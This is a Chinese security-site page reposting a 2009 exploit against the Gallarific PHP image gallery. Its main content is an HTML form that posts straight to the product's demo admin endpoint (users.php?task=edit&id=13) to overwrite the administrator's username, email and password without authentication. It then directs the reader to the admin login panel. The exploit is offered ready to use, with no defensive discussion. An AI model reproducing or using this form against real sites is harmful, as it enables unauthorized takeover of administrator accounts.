首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Gallarific (user.php) Arbirary Change Admin Information Exploit
来源:vfocus.net 作者:vfocus 发布时间:2009-05-27  
 <titre> gallarific exploit </titre>
 <body bgcolor="#000000">

 <div id="content">
  <h2><font color="#FFFFFF">change password </font></h2>
  <form enctype="multipart/form-data" action="http://www.gallarific.com/demo/gadmin/users.php?task=edit&id=13" method="post" onsubmit="return userFormCheck()">
  <input type="hidden" name="id" value="13">
  <div id="error" class="er" style="display:none"></div>
  <table class="fm" width="408">
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5">
  Founder :</font></td>
  <td class="fc"><input type="text" name="username" id="username" class="if" value="TiGeR-Dz"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5">&nbsp;Email:</font></td>
  <td class="fc"><input type="text" name="email" id="email" class="if" value="tiger.dz@live.com.com"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font size="5" color="#FFFFFF">Script:</font></td>
  <td class="fc">
  <input type="text" name="password" id="password" class="if" value="gallarific php image gallery software" size="31"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5">
  HOME</font></td>
  <td class="fc">h<font size="4" color="#FFFFFF">http://www.gallarific.com/</font></td>
  </tr>
  </table>
  <p align="center"><input class="su" type="submit" value="Go to change password &raquo;"></p>
  <p><font color="#FFFFFF" size="4">Note:after change password go to 
  login in control admin panel :</font></p>
  <p><font size="4" color="#FFFFFF">http://www.gallarific.com/demo/gadmin/index.php</font></p>
  <p align="center">&nbsp;</p>
  <p align="center">&nbsp;</p>
  </form>
  </div>
 <div id="help">
  &nbsp;</div>
 <br>
</body>
</html>

# [2009-05-26]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ultimate Media Script 2.0 Remo
·RoomPHPlanning 1.6 Multiple Re
·Mozilla Firefox (unclamped loo
·Safari RSS feed:// Buffer Over
·eZoneScripts Hotornot2 Script
·PHP <= 5.2.9 Local Safemod Byp
·Webradev Download Protect 1.0
·Flax Article Manager 1.1 (Cook
·Wordpress Plugin Lytebox (wp-l
·Joomla Component com_rsgallery
·cpCommerce 1.2.x GLOBALS[prefi
·Kensei Board <= 2.0.0b Multipl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved